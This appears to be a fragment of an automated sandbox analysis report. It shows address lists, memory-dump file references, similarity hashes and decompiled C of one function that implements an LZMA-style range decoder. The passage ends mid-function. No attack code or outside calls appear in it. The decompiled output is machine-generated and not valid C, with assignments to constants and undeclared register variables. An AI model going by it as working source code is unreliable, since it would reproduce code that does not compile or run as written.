                              0x00406ccb
                              0x00406ccb
                              0x00406cce
                              0x00406cd0
                              0x00406cd0
                              0x00000000
                              0x00000000
                              0x00406f12
                              0x00406f12
                              0x00406f12
                              0x00406f16
                              0x00000000
                              0x00000000
                              0x00406f1c
                              0x00406f1f
                              0x00406f22
                              0x00406f25
                              0x00406f27
                              0x00406f27
                              0x00406f27
                              0x00406f2a
                              0x00406f2d
                              0x00406f30
                              0x00406f33
                              0x00406f36
                              0x00406f39
                              0x00406f3a
                              0x00406f3c
                              0x00406f3c
                              0x00406f3c
                              0x00406f3f
                              0x00406f42
                              0x00406f45
                              0x00406f48
                              0x00406f4b
                              0x00406f4f
                              0x00406f51
                              0x00406f54
                              0x00000000
                              0x00406f56
                              0x00406cd3
                              0x00406cd3
                              0x00000000
                              0x00406cd3
                              0x00406f54
                              0x00407189
                              0x004071ab
                              0x004071b1
                              0x004071b3
                              0x004071ba
                              0x004071bc
                              0x004071c3
                              0x004071c7
                              0x00000000
                              0x004067b8
                              0x004071c0
                              0x004071c0
                              0x00000000
                              0x004071c0
                              0x0040700d
                              0x00407093
                              0x00407099
                              0x0040709c
                              0x0040709f
                              0x004070a2
                              0x004070a5
                              0x004070a8
                              0x004070ab
                              0x004070ae
                              0x004070b4
                              0x004070cd
                              0x004070d0
                              0x004070d3
                              0x004070d6
                              0x004070da
                              0x004070dc
                              0x004070dd
                              0x004070e0
                              0x004070b6
                              0x004070b6
                              0x004070be
                              0x004070c3
                              0x004070c5
                              0x004070c8
                              0x004070c8
                              0x004070ea
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x004070ec
                              0x004070ea
                              0x00000000
                              0x00406f5f

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                              • Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
                              • Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                              • Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E00406C71() {
                              				unsigned short _t532;
                              				signed int _t533;
                              				void _t534;
                              				void* _t535;
                              				signed int _t536;
                              				signed int _t565;
                              				signed int _t568;
                              				signed int _t589;
                              				signed int* _t606;
                              				void* _t613;
                              
                              				L0:
                              				while(1) {
                              					L0:
                              					if( *(_t613 - 0x40) != 0) {
                              						L89:
                              						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                              						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                              						L69:
                              						_t606 =  *(_t613 - 0x58);
                              						 *(_t613 - 0x84) = 0x12;
                              						L132:
                              						 *(_t613 - 0x54) = _t606;
                              						L133:
                              						_t532 =  *_t606;
                              						_t589 = _t532 & 0x0000ffff;
                              						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                              						if( *(_t613 - 0xc) >= _t565) {
                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                              							 *(_t613 - 0x40) = 1;
                              							_t533 = _t532 - (_t532 >> 5);
                              							 *_t606 = _t533;
                              						} else {
                              							 *(_t613 - 0x10) = _t565;
                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                              						}
                              						if( *(_t613 - 0x10) >= 0x1000000) {
                              							L139:
                              							_t534 =  *(_t613 - 0x84);
                              							L140:
                              							 *(_t613 - 0x88) = _t534;
                              							goto L1;
                              						} else {
                              							L137:
                              							if( *(_t613 - 0x6c) == 0) {
                              								 *(_t613 - 0x88) = 5;
                              								goto L170;
                              							}
                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                              							goto L139;
                              						}
                              					} else {
                              						if( *(__ebp - 0x60) == 0) {
                              							L171:
                              							_t536 = _t535 | 0xffffffff;
                              							L172:
                              							return _t536;
                              						}
                              						__eax = 0;
                              						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                              						0 | _t258 = _t258 + _t258 + 9;
                              						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                              						L75:
                              						if( *(__ebp - 0x64) == 0) {
                              							 *(__ebp - 0x88) = 0x1b;
                              							L170:
                              							_t568 = 0x22;
                              							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                              							_t536 = 0;
                              							goto L172;
                              						}
                              						__eax =  *(__ebp - 0x14);
                              						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              						if(__eax >=  *(__ebp - 0x74)) {
                              							__eax = __eax +  *(__ebp - 0x74);
                              						}
                              						__edx =  *(__ebp - 8);
                              						__cl =  *(__eax + __edx);
                              						__eax =  *(__ebp - 0x14);
                              						 *(__ebp - 0x5c) = __cl;
                              						 *(__eax + __edx) = __cl;
                              						__eax = __eax + 1;
                              						__edx = 0;
                              						_t274 = __eax %  *(__ebp - 0x74);
                              						__eax = __eax /  *(__ebp - 0x74);
                              						__edx = _t274;
                              						__eax =  *(__ebp - 0x68);
                              						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                              						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                              						_t283 = __ebp - 0x64;
                              						 *_t283 =  *(__ebp - 0x64) - 1;
                              						 *( *(__ebp - 0x68)) = __cl;
                              						L79:
                              						 *(__ebp - 0x14) = __edx;
                              						L80:
                              						 *(__ebp - 0x88) = 2;
                              					}
                              					L1:
                              					_t535 =  *(_t613 - 0x88);
                              					if(_t535 > 0x1c) {
                              						goto L171;
                              					}
                              					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
                              						case 0:
                              							if( *(_t613 - 0x6c) == 0) {
                              								goto L170;
                              							}
                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              							_t535 =  *( *(_t613 - 0x70));
                              							if(_t535 > 0xe1) {
                              								goto L171;
                              							}
                              							_t539 = _t535 & 0x000000ff;
                              							_push(0x2d);
                              							asm("cdq");
                              							_pop(_t570);
                              							_push(9);
                              							_pop(_t571);
                              							_t609 = _t539 / _t570;
                              							_t541 = _t539 % _t570 & 0x000000ff;
                              							asm("cdq");
                              							_t604 = _t541 % _t571 & 0x000000ff;
                              							 *(_t613 - 0x3c) = _t604;
                              							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                              							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                              							_t612 = (0x300 << _t604 + _t609) + 0x736;
                              							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                              								L10:
                              								if(_t612 == 0) {
                              									L12:
                              									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                              									goto L15;
                              								} else {
                              									goto L11;
                              								}
                              								do {
                              									L11:
                              									_t612 = _t612 - 1;
                              									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                              								} while (_t612 != 0);
                              								goto L12;
                              							}
                              							if( *(_t613 - 4) != 0) {
                              								GlobalFree( *(_t613 - 4));
                              							}
                              							_t535 = GlobalAlloc(0x40, 0x600); // executed
                              							 *(_t613 - 4) = _t535;
                              							if(_t535 == 0) {
                              								goto L171;
                              							} else {
                              								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                              								goto L10;
                              							}
                              						case 1:
                              							L13:
                              							__eflags =  *(_t613 - 0x6c);
                              							if( *(_t613 - 0x6c) == 0) {
                              								 *(_t613 - 0x88) = 1;
                              								goto L170;
                              							}
                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                              							_t45 = _t613 - 0x48;
                              							 *_t45 =  *(_t613 - 0x48) + 1;
                              							__eflags =  *_t45;
                              							L15:
                              							if( *(_t613 - 0x48) < 4) {
                              								goto L13;
                              							}
                              							_t547 =  *(_t613 - 0x40);
                              							if(_t547 ==  *(_t613 - 0x74)) {
                              								L20:
                              								 *(_t613 - 0x48) = 5;
                              								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                              								goto L23;
                              							}
                              							 *(_t613 - 0x74) = _t547;
                              							if( *(_t613 - 8) != 0) {
                              								GlobalFree( *(_t613 - 8));
                              							}
                              							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                              							 *(_t613 - 8) = _t535;
                              							if(_t535 == 0) {
                              								goto L171;
                              							} else {
                              								goto L20;
                              							}
                              						case 2:
                              							L24:
                              							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                              							 *(_t613 - 0x84) = 6;
                              							 *(_t613 - 0x4c) = _t554;
                              							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                              							goto L132;
                              						case 3:
                              							L21:
                              							__eflags =  *(_t613 - 0x6c);
                              							if( *(_t613 - 0x6c) == 0) {
                              								 *(_t613 - 0x88) = 3;
                              								goto L170;
                              							}
                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                              							_t67 = _t613 - 0x70;
                              							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                              							__eflags =  *_t67;
                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                              							L23:
                              							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                              							if( *(_t613 - 0x48) != 0) {
                              								goto L21;
                              							}
                              							goto L24;
                              						case 4:
                              							goto L133;
                              						case 5:
                              							goto L137;
                              						case 6:
                              							__edx = 0;
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__eax =  *(__ebp - 4);
                              								__ecx =  *(__ebp - 0x38);
                              								 *(__ebp - 0x34) = 1;
                              								 *(__ebp - 0x84) = 7;
                              								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                              								goto L132;
                              							}
                              							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                              							__esi =  *(__ebp - 0x60);
                              							__cl = 8;
                              							__cl = 8 -  *(__ebp - 0x3c);
                              							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                              							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                              							__ecx =  *(__ebp - 0x3c);
                              							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                              							__ecx =  *(__ebp - 4);
                              							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                              							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                              							__eflags =  *(__ebp - 0x38) - 4;
                              							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              							if( *(__ebp - 0x38) >= 4) {
                              								__eflags =  *(__ebp - 0x38) - 0xa;
                              								if( *(__ebp - 0x38) >= 0xa) {
                              									_t98 = __ebp - 0x38;
                              									 *_t98 =  *(__ebp - 0x38) - 6;
                              									__eflags =  *_t98;
                              								} else {
                              									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                              								}
                              							} else {
                              								 *(__ebp - 0x38) = 0;
                              							}
                              							__eflags =  *(__ebp - 0x34) - __edx;
                              							if( *(__ebp - 0x34) == __edx) {
                              								__ebx = 0;
                              								__ebx = 1;
                              								goto L61;
                              							} else {
                              								__eax =  *(__ebp - 0x14);
                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              								__eflags = __eax -  *(__ebp - 0x74);
                              								if(__eax >=  *(__ebp - 0x74)) {
                              									__eax = __eax +  *(__ebp - 0x74);
                              									__eflags = __eax;
                              								}
                              								__ecx =  *(__ebp - 8);
                              								__ebx = 0;
                              								__ebx = 1;
                              								__al =  *((intOrPtr*)(__eax + __ecx));
                              								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                              								goto L41;
                              							}
                              						case 7:
                              							__eflags =  *(__ebp - 0x40) - 1;
                              							if( *(__ebp - 0x40) != 1) {
                              								__eax =  *(__ebp - 0x24);
                              								 *(__ebp - 0x80) = 0x16;
                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              								__eax =  *(__ebp - 0x28);
                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              								__eax =  *(__ebp - 0x2c);
                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              								__eax = 0;
                              								__eflags =  *(__ebp - 0x38) - 7;
                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              								__al = __al & 0x000000fd;
                              								__eax = (__eflags >= 0) - 1 + 0xa;
                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                              								__eax =  *(__ebp - 4);
                              								__eax =  *(__ebp - 4) + 0x664;
                              								__eflags = __eax;
                              								 *(__ebp - 0x58) = __eax;
                              								goto L69;
                              							}
                              							__eax =  *(__ebp - 4);
                              							__ecx =  *(__ebp - 0x38);
                              							 *(__ebp - 0x84) = 8;
                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                              							goto L132;
                              						case 8:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__eax =  *(__ebp - 4);
                              								__ecx =  *(__ebp - 0x38);
                              								 *(__ebp - 0x84) = 0xa;
                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                              							} else {
                              								__eax =  *(__ebp - 0x38);
                              								__ecx =  *(__ebp - 4);
                              								__eax =  *(__ebp - 0x38) + 0xf;
                              								 *(__ebp - 0x84) = 9;
                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                              							}
                              							goto L132;
                              						case 9:
                              							goto L0;
                              						case 0xa:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__eax =  *(__ebp - 4);
                              								__ecx =  *(__ebp - 0x38);
                              								 *(__ebp - 0x84) = 0xb;
                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                              								goto L132;
                              							}
                              							__eax =  *(__ebp - 0x28);
                              							goto L88;
                              						case 0xb:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__ecx =  *(__ebp - 0x24);
                              								__eax =  *(__ebp - 0x20);
                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              							} else {
                              								__eax =  *(__ebp - 0x24);
                              							}
                              							__ecx =  *(__ebp - 0x28);
                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              							L88:
                              							__ecx =  *(__ebp - 0x2c);
                              							 *(__ebp - 0x2c) = __eax;
                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              							goto L89;
                              						case 0xc:
                              							L99:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0xc;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t334 = __ebp - 0x70;
                              							 *_t334 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t334;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							__eax =  *(__ebp - 0x2c);
                              							goto L101;
                              						case 0xd:
                              							L37:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0xd;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t122 = __ebp - 0x70;
                              							 *_t122 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t122;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							L39:
                              							__eax =  *(__ebp - 0x40);
                              							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                              								goto L48;
                              							}
                              							__eflags = __ebx - 0x100;
                              							if(__ebx >= 0x100) {
                              								goto L54;
                              							}
                              							L41:
                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                              							__ecx =  *(__ebp - 0x58);
                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                              							 *(__ebp - 0x48) = __eax;
                              							__eax = __eax + 1;
                              							__eax = __eax << 8;
                              							__eax = __eax + __ebx;
                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              							__ax =  *__esi;
                              							 *(__ebp - 0x54) = __esi;
                              							__edx = __ax & 0x0000ffff;
                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                              							__eflags =  *(__ebp - 0xc) - __ecx;
                              							if( *(__ebp - 0xc) >= __ecx) {
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              								__cx = __ax;
                              								 *(__ebp - 0x40) = 1;
                              								__cx = __ax >> 5;
                              								__eflags = __eax;
                              								__ebx = __ebx + __ebx + 1;
                              								 *__esi = __ax;
                              							} else {
                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                              								 *(__ebp - 0x10) = __ecx;
                              								0x800 = 0x800 - __edx;
                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                              								__ebx = __ebx + __ebx;
                              								 *__esi = __cx;
                              							}
                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                              							 *(__ebp - 0x44) = __ebx;
                              							if( *(__ebp - 0x10) >= 0x1000000) {
                              								goto L39;
                              							} else {
                              								goto L37;
                              							}
                              						case 0xe:
                              							L46:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0xe;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t156 = __ebp - 0x70;
                              							 *_t156 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t156;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							while(1) {
                              								L48:
                              								__eflags = __ebx - 0x100;
                              								if(__ebx >= 0x100) {
                              									break;
                              								}
                              								__eax =  *(__ebp - 0x58);
                              								__edx = __ebx + __ebx;
                              								__ecx =  *(__ebp - 0x10);
                              								__esi = __edx + __eax;
                              								__ecx =  *(__ebp - 0x10) >> 0xb;
                              								__ax =  *__esi;
                              								 *(__ebp - 0x54) = __esi;
                              								__edi = __ax & 0x0000ffff;
                              								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              								__eflags =  *(__ebp - 0xc) - __ecx;
                              								if( *(__ebp - 0xc) >= __ecx) {
                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              									__cx = __ax;
                              									_t170 = __edx + 1; // 0x1
                              									__ebx = _t170;
                              									__cx = __ax >> 5;
                              									__eflags = __eax;
                              									 *__esi = __ax;
                              								} else {
                              									 *(__ebp - 0x10) = __ecx;
                              									0x800 = 0x800 - __edi;
                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              									__ebx = __ebx + __ebx;
                              									 *__esi = __cx;
                              								}
                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                              								 *(__ebp - 0x44) = __ebx;
                              								if( *(__ebp - 0x10) >= 0x1000000) {
                              									continue;
                              								} else {
                              									goto L46;
                              								}
                              							}
                              							L54:
                              							_t173 = __ebp - 0x34;
                              							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                              							__eflags =  *_t173;
                              							goto L55;
                              						case 0xf:
                              							L58:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0xf;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t203 = __ebp - 0x70;
                              							 *_t203 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t203;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							L60:
                              							__eflags = __ebx - 0x100;
                              							if(__ebx >= 0x100) {
                              								L55:
                              								__al =  *(__ebp - 0x44);
                              								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                              								goto L56;
                              							}
                              							L61:
                              							__eax =  *(__ebp - 0x58);
                              							__edx = __ebx + __ebx;
                              							__ecx =  *(__ebp - 0x10);
                              							__esi = __edx + __eax;
                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                              							__ax =  *__esi;
                              							 *(__ebp - 0x54) = __esi;
                              							__edi = __ax & 0x0000ffff;
                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              							__eflags =  *(__ebp - 0xc) - __ecx;
                              							if( *(__ebp - 0xc) >= __ecx) {
                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              								__cx = __ax;
                              								_t217 = __edx + 1; // 0x1
                              								__ebx = _t217;
                              								__cx = __ax >> 5;
                              								__eflags = __eax;
                              								 *__esi = __ax;
                              							} else {
                              								 *(__ebp - 0x10) = __ecx;
                              								0x800 = 0x800 - __edi;
                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              								__ebx = __ebx + __ebx;
                              								 *__esi = __cx;
                              							}
                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                              							 *(__ebp - 0x44) = __ebx;
                              							if( *(__ebp - 0x10) >= 0x1000000) {
                              								goto L60;
                              							} else {
                              								goto L58;
                              							}
                              						case 0x10:
                              							L109:
                              							__eflags =  *(__ebp - 0x6c);
                              							if( *(__ebp - 0x6c) == 0) {
                              								 *(__ebp - 0x88) = 0x10;
                              								goto L170;
                              							}
                              							__ecx =  *(__ebp - 0x70);
                              							__eax =  *(__ebp - 0xc);
                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							_t365 = __ebp - 0x70;
                              							 *_t365 =  *(__ebp - 0x70) + 1;
                              							__eflags =  *_t365;
                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              							goto L111;
                              						case 0x11:
                              							goto L69;
                              						case 0x12:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								__eax =  *(__ebp - 0x58);
                              								 *(__ebp - 0x84) = 0x13;
                              								__esi =  *(__ebp - 0x58) + 2;
                              								goto L132;
                              							}
                              							__eax =  *(__ebp - 0x4c);
                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                              							__ecx =  *(__ebp - 0x58);
                              							__eax =  *(__ebp - 0x4c) << 4;
                              							__eflags = __eax;
                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                              							goto L130;
                              						case 0x13:
                              							__eflags =  *(__ebp - 0x40);
                              							if( *(__ebp - 0x40) != 0) {
                              								_t469 = __ebp - 0x58;
                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                              								__eflags =  *_t469;
                              								 *(__ebp - 0x30) = 0x10;
                              								 *(__ebp - 0x40) = 8;
                              								L144:
                              								 *(__ebp - 0x7c) = 0x14;
                              								goto L145;
                              							}
                              							__eax =  *(__ebp - 0x4c);
                              							__ecx =  *(__ebp - 0x58);
                              							__eax =  *(__ebp - 0x4c) << 4;
                              							 *(__ebp - 0x30) = 8;
                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                              							L130:
                              							 *(__ebp - 0x58) = __eax;
                              							 *(__ebp - 0x40) = 3;
                              							goto L144;
                              						case 0x14:
                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                              							__eax =  *(__ebp - 0x80);
                              							goto L140;
                              						case 0x15:
                              							__eax = 0;
                              							__eflags =  *(__ebp - 0x38) - 7;
                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              							__al = __al & 0x000000fd;
                              							__eax = (__eflags >= 0) - 1 + 0xb;
                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                              							goto L120;
                              						case 0x16:
                              							__eax =  *(__ebp - 0x30);
                              							__eflags = __eax - 4;
                              							if(__eax >= 4) {
                              								_push(3);
                              								_pop(__eax);
                              							}
                              							__ecx =  *(__ebp - 4);
                              							 *(__ebp - 0x40) = 6;
                              							__eax = __eax << 7;
                              							 *(__ebp - 0x7c) = 0x19;
                              							 *(__ebp - 0x58) = __eax;
                              							goto L145;
                              						case 0x17:
                              							L145:
                              							__eax =  *(__ebp - 0x40);
                              							 *(__ebp - 0x50) = 1;
